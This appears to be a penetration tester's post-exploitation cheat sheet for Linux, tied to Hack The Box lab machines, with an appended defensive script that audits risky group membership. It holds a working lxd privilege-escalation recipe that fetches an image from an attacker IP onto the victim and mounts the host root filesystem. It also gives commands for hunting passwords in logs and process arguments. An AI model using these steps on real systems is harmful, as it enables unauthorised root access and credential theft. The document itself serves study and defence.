Post Exploit Checks
General Enumeration
Check whether the environment is a real host or a container
ls -la / # dotfiles in the root directory (e.g. .dockerenv) indicate a Docker environment
hostname
Check the permissions of the current user
sudo -l
id
List the users on the system
cat /etc/passwd
Check for
.htaccess files
/etc/apache2/sites-enabled/*
/etc/nginx/nginx.conf
/etc/ssh/sshd_config
Application-specific configs: wp-config, settings.php, etc.
Groups Exploitation
4(adm)
Members of the adm group can read the log files
cd /var/log
grep -EnRi password .
Machines:
Academy - HTB : https://www.youtube.com/watch?v=yQl5RA6APyQ&t=2620
Doctor - HTB : https://youtube.com/watch?v=JcOR9krOPFY&t=1780
116(lxd)
Members of the lxd group can build a privileged LXD container (Docker-like) that mounts the host's root filesystem (/) inside the container, exposing the host's files as root
# attacker machine
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
# victim machine
lxd init # accept the defaults (yes to all)
wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # expected output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # expected output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # the shell is obtained as root inside the ignite container
cd /mnt/root # the root filesystem of the victim machine
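Defender-side counterpart to the two group checks above, added here as an example and not part of the original notes: a POSIX shell audit that parses /etc/group (constructed sample content inline, so it runs offline) and lists the members of the groups this page flags (adm, lxd) together with docker and sudo, which carry equivalent risk; the choice of groups is an assumption of this example.

```shell
#!/bin/sh
# Audit helper: report accounts belonging to groups that grant log access
# (adm) or host-level escalation (lxd, docker, sudo). Runs on group-file text
# passed as an argument so it can be tested against constructed data.

RISKY_GROUPS="adm lxd docker sudo"   # assumption: the groups worth flagging

# Constructed sample /etc/group content (not taken from a real host).
SAMPLE_GROUP='root:x:0:
adm:x:4:syslog,alice
lxd:x:116:bob
docker:x:998:
sudo:x:27:alice
www-data:x:33:'

# risky_group_members GROUP_FILE_TEXT
# Prints "group:user" for every member of a risky group, one per line, sorted.
risky_group_members() {
    printf '%s\n' "$1" | awk -F: -v risky="$RISKY_GROUPS" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) want[r[i]] = 1 }
        ($1 in want) && $4 != "" {
            m = split($4, users, ",")
            for (i = 1; i <= m; i++) print $1 ":" users[i]
        }' | sort
}

# risky_count GROUP_FILE_TEXT
# Number of findings; zero means no account sits in a flagged group.
risky_count() {
    risky_group_members "$1" | awk 'END { print NR }'
}

# With --live the script audits the real /etc/group, otherwise the sample.
if [ "${1:-}" = "--live" ]; then
    risky_group_members "$(cat /etc/group)"
else
    risky_group_members "$SAMPLE_GROUP"
fi
```

Schedule it from cron with `--live` and alert when the count changes from the baseline; a new lxd or docker member is worth the same attention as a new sudoer.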
Files Enumeration
Find SUID binaries
find / -perm /4000 -ls 2>/dev/null
Find writable files
find / -type f -writable 2>/dev/null | grep -v proc
Find files owned by a specific group
# ! -path <path> - omits files under the given directory
# -group <group name> - restricts results to that group
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null
Locations to check
ls /opt
ls /usr/local/bin
ls ~/.local/bin
Background Jobs Enumeration
Crontabs
crontab -l
cat /etc/crontab
Enumerate processes with pspy
Network Enumeration
Check the network adapters (the host might be communicating internally)
ip a
Open ports and services
netstat -antp
# look for unusual services running internally, or a MySQL service
Process Enumeration
Enumerate the running processes
ps aux
Get more information about a process (e.g. the arguments it was started with, which might contain passwords)
# get the process id from ps aux
cat /proc/<processid>/cmdline | tr '\0' ' ' # arguments are NUL-separated
Web Directories
Check the web directories for passwords
/var/www/*
MySQL
If MySQL is running as root on the machine, check for privilege escalation via a shared library
The \G terminator in a MySQL query prints the result in a prettier (vertical) format
# Connecting to mysql
mysql -u root -p
# password prompt
mysql> select * from wp_users \G # instead of "select * from wp_users;"